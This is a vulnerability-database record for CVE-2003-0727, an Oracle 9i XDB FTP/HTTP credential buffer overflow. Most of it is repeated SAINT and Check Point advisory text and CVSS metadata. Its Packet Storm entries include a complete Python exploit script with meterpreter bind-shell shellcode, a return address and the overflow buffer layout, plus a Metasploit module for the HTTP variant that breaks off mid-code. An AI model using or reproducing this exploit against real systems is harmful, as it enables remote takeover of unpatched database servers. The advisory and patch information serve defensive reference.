ID SAINT:FEBDE6067ED68D17D37C8F54DDD884A4
Type saint
Reporter SAINT Corporation
Modified 2009-02-25T00:00:00
Description
Added: 02/25/2009
CVE: CVE-2003-0727
BID: 8375
OSVDB: 2449
Background
Oracle 9i release 2 includes the XDB FTP service, which by default listens on port 2100.
Problem
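A buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during authentication. Note that the CVSS v2 data attached to this record (base score 2.1, vector AV:L/AC:L/Au:N/C:N/I:N/A:P) describes a local, availability-only issue, which does not match the remote command execution described here; triage by the described impact rather than by that score.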
Resolution
The vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches, follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>.
References
<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf>
<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf>
<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html>
Limitations
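The exploit works against version 9.2.0.1. This describes the exploit's tested target, not the full set of vulnerable versions; the Resolution section gives 9.2.0.4 as the fixed version.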
Platforms
Windows Server 2003 SP2 / Windows Server 2003
Windows Server 2003 SP1
Windows Server 2003 SP0, SP1, SP2 (DEP disabled)
Windows 2000
{"id": "SAINT:FEBDE6067ED68D17D37C8F54DDD884A4", "vendorId": null, "type": "saint", "bulletinFamily": "exploit", "title": "Oracle 9i Release 2 XDB FTP Pass Overflow", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB FTP service which by default listens on port 2100. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "published": "2009-02-25T00:00:00", "modified": "2009-02-25T00:00:00", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "userInteractionRequired": 
false}, "cvss3": {}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_ftp_pass_overflow", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2003-0727"], "immutableFields": [], "lastseen": "2021-07-28T14:33:35", "viewCount": 6, "enchantments": {"dependencies": {}, "score": {"value": 7.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2006-008"]}, {"type": "cve", "idList": ["CVE-2003-0727"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FTP/ORACLE9I_XDB_FTP_PASS", "MSF:EXPLOIT/WINDOWS/FTP/ORACLE9I_XDB_FTP_UNLOCK", "MSF:EXPLOIT/WINDOWS/HTTP/ORACLE9I_XDB_PASS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144108"]}, {"type": "saint", "idList": ["SAINT:4ED30277F5B736B24E4141FC17DCC376", "SAINT:548601822EB48611F760016295035CD0"]}, {"type": "zdt", "idList": ["1337DAY-ID-28634"]}]}, "exploitation": null, "vulnersScore": 7.4}, "_state": {"dependencies": 1645297268}}
{"saint": [{"lastseen": "2016-10-03T15:02:00", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB HTTP service which by default listens on port 8080. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during HTTP Basic authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB HTTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:BA10869CDDBD71263650D776FBB201BA", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_http_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-10-03T15:01:58", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: 
[2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB FTP service which by default listens on port 2100. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB FTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:C6ADA78BEBD296FDFA33FCAD1C4138AC", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_ftp_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2022-01-26T11:32:55", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB FTP service which by default listens on port 2100. 
\n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB FTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:C92EC71290FFC687B136AB1A68793851", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_ftp_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-29T16:40:36", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: 
[8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB HTTP service which by default listens on port 8080. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during HTTP Basic authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB HTTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:56366612FCFF29875ACDF59C60B5205D", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_http_pass_overflow", "cvss": {"score": 2.1, "vector": 
"AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-29T16:40:15", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB FTP service which by default listens on port 2100. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB FTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": 
"SAINT:4ED30277F5B736B24E4141FC17DCC376", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_ftp_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-28T14:33:20", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB HTTP service which by default listens on port 8080. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during HTTP Basic authentication. \n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. 
\n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB HTTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:DD0DB96DDBDB643161575C84D45AFA81", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_http_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-26T11:32:55", "description": "Added: 02/25/2009 \nCVE: [CVE-2003-0727](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727>) \nBID: [8375](<http://www.securityfocus.com/bid/8375>) \nOSVDB: [2449](<http://www.osvdb.org/2449>) \n\n\n### Background\n\nOracle 9i release 2 includes the XDB HTTP service which by default listens on port 8080. \n\n### Problem\n\nA buffer overflow vulnerability in the parsing of credentials passed to the server allows remote attackers to execute arbitrary commands by sending a long username or password during HTTP Basic authentication. 
\n\n### Resolution\n\nThe vulnerability is fixed in Oracle 9i version 9.2.0.4. To download and install the relevant patches follow the guide included in <http://www.oracle.com/technology/deploy/security/pdf/2003Alert58.pdf>. \n\n### References\n\n<http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf> \n<http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf> \n<http://www.appsecinc.com/resources/alerts/oracle/2003-0005.html> \n\n\n### Limitations\n\nExploit works against version 9.2.0.1 \n\n### Platforms\n\nWindows Server 2003 SP2 / Windows Server 2003 \nWindows Server 2003 SP1 \nWindows Server 2003 SP0,SP1,SP2 DEP-Disabled \nWindows 2000 \n \n\n", "cvss3": {}, "published": "2009-02-25T00:00:00", "type": "saint", "title": "Oracle 9i Release 2 XDB HTTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2009-02-25T00:00:00", "id": "SAINT:548601822EB48611F760016295035CD0", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/oracle_xdb_http_pass_overflow", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-10T00:00:00", "description": "", "cvss3": {}, "published": "2006-02-12T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Database Server XML Database Buffer Overflow (CVE-2003-0727)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2006-02-12T00:00:00", "id": "CPAI-2006-008", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Oracle 9i XML database suffers from a buffer overflow vulnerability. By passing an overly long username or password, an attacker can execute arbitrary code on the target system.", "cvss3": {}, "published": "2006-02-12T00:00:00", "type": "checkpoint_advisories", "title": "Update Protection against Oracle XDB HTTP Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0727"], "modified": "2007-05-08T00:00:00", "id": "CPAI-2006-013", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:51", "description": "", "cvss3": {}, "published": "2016-02-03T00:00:00", "type": "packetstorm", "title": "Oracle 9i XDB FTP Pass Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2016-02-03T00:00:00", "id": "PACKETSTORM:135572", "href": "https://packetstormsecurity.com/files/135572/Oracle-9i-XDB-FTP-Pass-Overflow.html", "sourceData": "`''' \nOracle 9i XDB FTP 
PASS Overflow (win32) \nPorted to python from the Metasploit oracle9i_xdb_ftp_pass.rb exploit \nOriginal exploit: \nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb \n \nDescription from original exploit: \nBy passing an overly long string to the PASS command, a \nstack based buffer overflow occurs. David Litchfield, has \nillustrated multiple vulnerabilities in the Oracle 9i XML \nDatabase (XDB), during a seminar on \"Variations in exploit \nmethods between Linux and Windows\" presented at the Blackhat \nconference. \nhttp://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf \n \nCVE: 2003-0727 \nOSVDB: 2449 \nBID: 8375 \n \nDate: 2/2/2016 \nPorted by: Tom Ryans \nTested on: Win 2000 SP4 \n \nUsage: oracle9i_ftp_pass.py target_ip target_port \nex. oracle9i_ftp_pass.py 127.0.0.1 2100 \n \nSpawns meterpreter bind shell on port 7000. \n''' \n \n#!/usr/bin/python \n \nimport sys, socket \n \nif len(sys.argv) != 3: \nprint \"Usage: %s target_ip target_port\" % sys.argv[0] \nsys.exit() \n \nhost = str(sys.argv[1]) \nport = int(sys.argv[2]) \n \n#msfvenom -p windows/meterpreter/bind_tcp lport=7000 EXITFUNC=thread -b \"\\x00\\x09\\x0a\\x0d\\x20\\x22\\x25\\x26\\x27\\x2b\\x2f\\x3a\\x3c\\x3e\\x3f\\x40\" -f c \nshellcode = ( \n\"\\xdb\\xc8\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x4b\\xbd\\xe8\\xe3\\x74\" \n\"\\x4e\\x83\\xc3\\x04\\x31\\x6b\\x16\\x03\\x6b\\x16\\xe2\\x1d\\x1f\\x9c\\xcc\" \n\"\\xdd\\xe0\\x5d\\xb1\\x54\\x05\\x6c\\xf1\\x02\\x4d\\xdf\\xc1\\x41\\x03\\xec\" \n\"\\xaa\\x07\\xb0\\x67\\xde\\x8f\\xb7\\xc0\\x55\\xe9\\xf6\\xd1\\xc6\\xc9\\x99\" \n\"\\x51\\x15\\x1d\\x7a\\x6b\\xd6\\x50\\x7b\\xac\\x0b\\x98\\x29\\x65\\x47\\x0e\" \n\"\\xde\\x02\\x1d\\x92\\x55\\x58\\xb3\\x92\\x8a\\x29\\xb2\\xb3\\x1c\\x21\\xed\" \n\"\\x13\\x9e\\xe6\\x85\\x1a\\xb8\\xeb\\xa0\\xd5\\x33\\xdf\\x5f\\xe4\\x95\\x11\" \n\"\\x9f\\x4a\\xd8\\x9d\\x52\\x93\\x1c\\x19\\x8d\\xe6\\x54\\x59\\x30\\xf0\\xa2\" 
\n\"\\x23\\xee\\x75\\x31\\x83\\x65\\x2d\\x9d\\x35\\xa9\\xab\\x56\\x39\\x06\\xb8\" \n\"\\x31\\x5e\\x99\\x6d\\x4a\\x5a\\x12\\x90\\x9d\\xea\\x60\\xb6\\x39\\xb6\\x33\" \n\"\\xd7\\x18\\x12\\x95\\xe8\\x7b\\xfd\\x4a\\x4c\\xf7\\x10\\x9e\\xfd\\x5a\\x7d\" \n\"\\x53\\xcf\\x64\\x7d\\xfb\\x58\\x16\\x4f\\xa4\\xf2\\xb0\\xe3\\x2d\\xdc\\x47\" \n\"\\x03\\x04\\x98\\xd8\\xfa\\xa7\\xd8\\xf1\\x38\\xf3\\x88\\x69\\xe8\\x7c\\x43\" \n\"\\x6a\\x15\\xa9\\xf9\\x61\\xb0\\x02\\x1f\\x88\\x28\\xa2\\xb5\\x71\\xc5\\x4e\" \n\"\\x46\\xa9\\xf5\\x70\\x8d\\xc2\\x9e\\x8c\\x2d\\xf6\\x06\\x18\\xcb\\x62\\xa7\" \n\"\\x4c\\x44\\x1b\\x05\\xab\\x5d\\xbc\\x76\\x99\\x24\\x82\\xfc\\x7a\\x71\\x6b\" \n\"\\x48\\x93\\x45\\x94\\x49\\xb1\\xe2\\x02\\xc2\\xd6\\x37\\x32\\xd5\\xf2\\x10\" \n\"\\x23\\x42\\x88\\xf0\\x06\\xf2\\x8d\\xd9\\xf3\\xf4\\x1b\\xe5\\x55\\xa2\\xb3\" \n\"\\xe7\\x80\\x84\\x1b\\x18\\xe7\\x96\\x5c\\xe6\\x76\\xb4\\x17\\xd0\\xec\\x86\" \n\"\\x4f\\x1c\\xe1\\x06\\x90\\x4a\\x6b\\x07\\xf8\\x2a\\xcf\\x54\\x1d\\x35\\xda\" \n\"\\xc8\\x8e\\xa3\\xe5\\xb8\\x63\\x64\\x8e\\x46\\x5d\\x42\\x11\\xb8\\x88\\xd1\" \n\"\\x56\\x46\\x4d\\xd2\\xa7\\x84\\x98\\x1a\\xd2\\xe3\\x18\") \n \n \nuser = \"A\" * 10 \n# return address from Metasploit module: 0x60616d46 oraclient9.dll (pop/pop/ret) \nret = \"\\x46\\x6d\\x61\\x60\" \nprependencoder = \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\" #from Metasploit module \nnops = \"\\x90\" * (800 - len(shellcode) - len(prependencoder)) \n \nbuff = \"A\" * 442 + \"\\xeb\\x06\\x90\\x90\" + ret + nops + prependencoder + shellcode \nprint \" ++++++++++++++++++++++++++++++++++++++++++++\" \nprint \" + Oracle 9i XDB FTP PASS Overflow exploit +\" \nprint \" +++++++++++++++++++++++++++++++++++++++++++++\" \ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \ns.connect((host,port)) \nprint s.recv(1024) \nprint \"Sending %s size payload...\" % len(buff) \ns.send(\"USER \" + user + \"\\r\\n\") \ns.send(\"PASS \" + buff + \"\\r\\n\") \nprint \"Payload sent....\" \nprint \"Check port 7000 for meterpreter 
shell...\" \ns.close() \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/135572/oracle9i_ftp_pass.py.txt", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:14:27", "description": "", "cvss3": {}, "published": "2009-10-30T00:00:00", "type": "packetstorm", "title": "Oracle 9i XDB HTTP PASS Overflow (win32)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2003-0727"], "modified": "2009-10-30T00:00:00", "id": "PACKETSTORM:82937", "href": "https://packetstormsecurity.com/files/82937/Oracle-9i-XDB-HTTP-PASS-Overflow-win32.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)', \n'Description' => %q{ \nThis module exploits a stack overflow in the authorization \ncode of the Oracle 9i HTTP XDB service. David Litchfield, \nhas illustrated multiple vulnerabilities in the Oracle \n9i XML Database (XDB), during a seminar on \"Variations \nin exploit methods between Linux and Windows\" presented \nat the Blackhat conference. 
\n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2003-0727'], \n['OSVDB', '2449'], \n['BID', '8375'], \n['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 400, \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Aug 18 2003')) \n \nregister_options( [ Opt::RPORT(8080) ], self.class ) \n \nend \n \ndef check \nconnect \nsock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\") \nresp = sock.get_once \ndisconnect \n \nif (resp =~ /9.2.0.1.0/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nsploit = rand_text_english(4, payload_badchars) + \":\" \nsploit << rand_text_english(442, payload_badchars) \nsploit << \"\\xeb\\x64\" + make_nops(2) + [target.ret].pack('V') \nsploit << make_nops(266) + \"\\xeb\\x10\" + make_nops(109) + payload.encoded \n 